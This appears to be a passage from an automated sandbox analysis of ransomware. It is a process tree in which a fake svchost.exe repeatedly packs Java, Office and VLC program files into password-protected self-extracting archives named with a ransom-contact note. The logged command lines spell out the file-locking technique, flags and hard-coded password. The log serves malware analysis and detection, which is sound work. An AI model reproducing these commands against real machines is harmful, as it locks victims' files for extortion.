- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1544
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1200
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2664
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2340
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3016
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2724
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2784
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2352
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1384
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\bin\server\Xusage.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jre7\bin\server\Xusage.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1176
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\lib\jvm.hprof.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jre7\lib\jvm.hprof.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\README.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jre7\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\SplitGrant.docx(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\SplitGrant.docx" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\AUTHORS.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\COPYING.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\COPYING.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:860
- C:\ProgramData\msvkp\svchost.exe
